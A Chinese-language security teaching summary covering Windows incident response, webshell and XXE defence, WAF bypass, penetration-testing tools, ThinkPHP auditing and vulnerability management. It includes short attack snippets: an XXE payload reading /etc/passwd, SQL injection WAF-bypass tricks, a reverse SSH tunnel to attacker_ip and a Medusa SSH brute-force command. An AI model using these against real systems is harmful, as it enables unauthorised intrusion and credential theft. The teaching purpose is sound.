专注Web及移动安全[红日安全86期]
字数 1853 2025-08-18 11:38:41
Web及移动安全综合教学文档
一、应急响应与Windows安全
1.1 Windows应急响应处置流程
- 日志分析:重点检查安全日志(Event ID 4624/4625登录事件)、系统日志和应用日志
- RDP漏洞防护:针对CVE-2019-0708(BlueKeep)的修复方案:
- 安装微软官方补丁KB4499175/KB4499181
- 禁用RDP服务(非必要情况下)
- 启用网络级认证(NLA)
- 入侵检测:
- 异常进程检查(特别是位于temp目录的可执行文件)
- 可疑服务排查
- 计划任务审计
- 注册表自启动项检查
1.2 主机入侵检测技术
- HIDS架构:
- 数据采集层(文件监控、进程监控、网络监控)
- 分析引擎(规则匹配、行为分析)
- 响应处置模块
- 检测指标:
- 文件完整性变化(重要系统文件哈希值)
- 异常账号活动(非工作时间登录)
- 特权账号异常使用
二、Web安全攻防
2.1 WebShell检测与防御
- 流量特征:
- 固定User-Agent头(如"ant"、"rebeyond")
- Base64编码参数频繁出现
- 非常规HTTP方法(PUT/DELETE)
- 异常Cookie字段
- 检测方法:
- 静态特征检测(文件哈希、关键词)
- 动态行为分析(文件操作、命令执行)
- 网络流量分析(长连接维持)
2.2 XXE漏洞攻防
- XML基础知识:
<!-- 外部实体引用示例 --> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo> - 攻击类型:
- 文件读取
- SSRF攻击
- 拒绝服务
- 防御措施:
- 禁用DTD和外部实体
- 使用JSON替代XML
- 输入过滤(关键词)
2.3 注入攻击绕过技术
- 云锁绕过方法:
- 注释分割:
UNION/**/SELECT - 空白符替代:
UNION%0bSELECT - 大小写混合:
uNiOn SeLeCt - 等价函数替换:
concat()→make_set()
- 注释分割:
- 防御建议:
- 参数化查询
- 最小权限原则
- WAF规则深度防御
三、渗透测试技术
3.1 内网穿透技术
- 反向SSH隧道:
# 攻击机执行(建立转发) ssh -R 3389:target_ip:3389 user@attacker_ip # 本地连接 rdesktop localhost:3389 - Cobalt Strike利用:
- MS17-010漏洞利用模块
- 横向移动技术:
- Pass-the-Hash
- 票据传递
- WMI远程执行
3.2 渗透测试实战要点
- 信息收集阶段:
- Webkiller工具使用:
python webkiller.py -d example.com -a - 子域名枚举
- 端口服务识别
- Webkiller工具使用:
- 提权技术:
- 内核漏洞利用(CVE-2019-1458)
- 服务配置错误
- 凭证转储(使用Mimikatz)
四、安全工具集
4.1 信息收集工具
- Medusa爆破工具:
medusa -h target_ip -u username -P wordlist.txt -M ssh - Trigmap(Nmap封装):
python trigmap.py -i 192.168.1.0/24 -f full_scan
4.2 漏洞扫描工具
- Killshot功能:
- 子域名爆破
- 目录扫描
- XSS/SQLi自动化检测
- 勒索病毒解密:
- TeslaCrypt解密工具
- GandCrab解密方案
- 文件恢复技术
五、代码审计技术
5.1 ThinkPHP漏洞分析
- 文件包含漏洞:
- 漏洞触发点:
\think\Loader::include - 利用条件:控制器名可控
- 修复方案:过滤
../等路径穿越字符
- 漏洞触发点:
- 代码执行漏洞:
// 危险函数调用链 Request::input() → filterValue() → call_user_func()- 防御措施:禁用危险函数、严格参数过滤
5.2 安全开发规范
- 输入验证原则:
- 白名单优于黑名单
- 数据类型严格校验
- 边界值检查
- 安全函数使用:
- 数据库操作:预处理语句
- 文件操作:禁用动态路径
- 命令执行:避免shell注入
六、企业安全建设
6.1 RASP技术
- 运行时防护:
- 函数Hook技术
- 行为分析引擎
- 上下文关联分析
- 部署模式:
- Java Agent
- PHP扩展
- .NET CLR集成
6.2 数据库审计
- 审计要点:
- 敏感数据访问
- 批量数据导出
- 非工作时间操作
- 权限变更记录
- 实现方案:
- 数据库原生审计功能
- 网络流量解析
- 代理层审计
七、漏洞预警与响应
7.1 漏洞管理流程
-
漏洞评估矩阵:
因素 权重 可利用性 30% 影响范围 25% 利用复杂度 20% 补救难度 15% 公开程度 10% -
补丁管理:
- 测试环境验证
- 分级部署策略
- 回滚方案准备
7.2 近期高危漏洞
- InfluxDB认证绕过:
- 影响版本:<1.7.6
- 利用方式:
/query端点直接访问
- WebLogic反序列化(CVE-2019-2725):
- 漏洞组件:wls9_async_response
- 防护措施:删除组件/升级补丁
本教学文档涵盖了Web及移动安全的核心知识点,建议结合实践环境进行验证测试。安全技术更新迅速,请持续关注最新漏洞动态和防御方案。